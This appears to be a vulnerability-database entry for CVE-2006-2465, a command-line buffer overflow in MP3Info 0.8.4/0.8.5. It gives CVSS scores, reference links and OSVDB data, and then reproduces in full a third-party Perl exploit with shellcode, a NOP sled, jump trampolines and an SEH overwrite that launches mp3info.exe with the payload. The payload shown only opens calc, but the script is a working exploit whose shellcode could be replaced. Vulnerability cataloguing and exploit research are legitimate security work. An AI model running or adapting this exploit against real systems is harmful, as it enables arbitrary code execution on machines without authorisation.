CVE-2006-2465
CVSS5.1
Published: 2006-05-19 06:02:00
Last modified: 2014-05-30 22:22:38

[Original] Buffer overflow in MP3Info 0.8.4 allows attackers to execute arbitrary code via a long command line argument. NOTE: if mp3info is not installed setuid or setgid in any reasonable context, then this issue might not be a vulnerability.


[CNNVD] MP3Info Unspecified Buffer Overflow Vulnerability (CNNVD-200605-370)

        A buffer overflow exists in MP3Info 0.8.4. An attacker can execute arbitrary code via a long command line argument. Note: if mp3info is not installed setuid or setgid in any reasonable context, this issue might not be a vulnerability.

- CVSS (base score)

CVSS score: 5.1 [MEDIUM]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Attack complexity: HIGH [exploitation requires specific access conditions]
Attack vector: [--]
Authentication: NONE [no authentication is required to exploit]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2465
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2465
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200605-370
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/18016
(UNKNOWN)  BID  18016
http://www.securiteam.com/exploits/5GP0E15IKO.html
(UNKNOWN)  MISC  http://www.securiteam.com/exploits/5GP0E15IKO.html
http://www.exploit-db.com/exploits/32358
(UNKNOWN)  EXPLOIT-DB  32358
http://securitytracker.com/id?1016108
(UNKNOWN)  SECTRACK  1016108
http://packetstormsecurity.com/files/125786/MP3Info-0.8.5-SEH-Buffer-Overflow.html
(UNKNOWN)  MISC  http://packetstormsecurity.com/files/125786/MP3Info-0.8.5-SEH-Buffer-Overflow.html
http://packetstormsecurity.com/files/124955/Mp3info-Stack-Buffer-Overflow.html
(UNKNOWN)  MISC  http://packetstormsecurity.com/files/124955/Mp3info-Stack-Buffer-Overflow.html
http://osvdb.org/show/osvdb/30945
(UNKNOWN)  OSVDB  30945

- Vulnerability information

MP3Info Unspecified Buffer Overflow Vulnerability
Medium severity; buffer overflow
2006-05-19 00:00:00 2006-05-19 00:00:00
Remote

- Advisories and patches

        No data available

- Vulnerability information (F125786)

MP3Info 0.8.5 SEH Buffer Overflow (PacketStormID:F125786)
2014-03-19 00:00:00
Ayman Sagy  
exploit,overflow
CVE-2006-2465,OSVDB-30945

MP3Info version 0.8.5 SEH buffer overflow exploit.

# Exploit Title: mp3info SEH exploit
# Date: 18 March 2014
# Exploit Author: Ayman Sagy <aymansagy [at] gmail.com>
# Vendor Homepage: http://ibiblio.org/mp3info/
# Software Link: http://www.exploit-db.com/wp-content/themes/exploit/applications/cb7b619a10a40aaac2113b87bb2b2ea2-mp3info-0.8.5a.tgz
# Version: MP3Info 0.8.5
# Tested on: Windows 7 Ultimate 64 and 32 bit
# CVE : 2006-2465
# Original POC: http://www.exploit-db.com/exploits/31220/
#
# The process memory region starts with a null byte, but exploitation is still possible because of
# the little endian architecture, provided that the return address gets placed at the end of the buffer;
# this, however, confines us to the tiny 4-byte area after pop/pop/retn.
# Using a couple of trampolines I jumped back to the beginning of the buffer, which is 533 bytes, enough to fit a calc payload.
#
# Run in the same directory as MP3Info; the exploit will launch mp3info with the payload as argument: perl mp3infosploit.pl

# mangled chars: F4->34 F3->33
# msfpayload windows/exec cmd=calc R | msfencode -b '\x00\0d\0a\x09' -t perl
$shellcode =
"\xdb\xd4\xba\x2b\xc5\x7d\xb7\xd9\x74\x24\xf4\x58\x29\xc9" .
"\xb1\x32\x31\x50\x17\x83\xe8\xfc\x03\x7b\xd6\x9f\x42\x87" .
"\x30\xd6\xad\x77\xc1\x89\x24\x92\xf0\x9b\x53\xd7\xa1\x2b" .
"\x17\xb5\x49\xc7\x75\x2d\xd9\xa5\x51\x42\x6a\x03\x84\x6d" .
"\x6b\xa5\x08\x21\xaf\xa7\xf4\x3b\xfc\x07\xc4\xf4\xf1\x46" .
"\x01\xe8\xfa\x1b\xda\x67\xa8\x8b\x6f\x35\x71\xad\xbf\x32" .
"\xc9\xd5\xba\x84\xbe\x6f\xc4\xd4\x6f\xfb\x8e\xcc\x04\xa3" .
"\x2e\xed\xc9\xb7\x13\xa4\x66\x03\xe7\x37\xaf\x5d\x08\x06" .
"\x8f\x32\x37\xa7\x02\x4a\x7f\x0f\xfd\x39\x8b\x6c\x80\x39" .
"\x48\x0f\x5e\xcf\x4d\xb7\x15\x77\xb6\x46\xf9\xee\x3d\x44" .
"\xb6\x65\x19\x48\x49\xa9\x11\x74\xc2\x4c\xf6\xfd\x90\x6a" .
"\xd2\xa6\x43\x12\x43\x02\x25\x2b\x93\xea\x9a\x89\xdf\x18" .
"\xce\xa8\xbd\x76\x11\x38\xb8\x3f\x11\x42\xc3\x6f\x7a\x73" .
"\x48\xe0\xfd\x8c\x9b\x45\xf1\xc6\x86\xef\x9a\x8e\x52\xb2" .
"\xc6\x30\x89\xf0\xfe\xb2\x38\x88\x04\xaa\x48\x8d\x41\x6c" .
"\xa0\xff\xda\x19\xc6\xac\xdb\x0b\xa5\x33\x48\xd7\x2a";
 
 
$exploit = "\x90"x156 . $shellcode;
$exploit .= "\x41"x142;
 
                                     
$exploit .=                             # larger jump to beginning of buffer
            "\x58\x58\x58".             # 58 POP EAX x 3
            "\x80\xc4\x02".             # 80C4 02          ADD AH,2
            "\xFF\xE0";                 # FFE0             JMP EAX  
 
 
$exploit .= "\xEB\xEF\x90\x90"; # short jmp back to get some space
 
 
#print length($exploit);
#exit(0);
print "\n";
$seh = "\x46\x34\x40"; # 0x00403446  mp3info.exe             POP EBX
 
$exploit = $exploit . $seh;
 
system("mp3info.exe", $exploit);

- Vulnerability information (OSVDB)

30945
MP3Info Command Line Argument Overflow
Input Manipulation
Loss of Integrity

- Vulnerability description

Unknown or Incomplete

- Timeline

2006-05-14 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete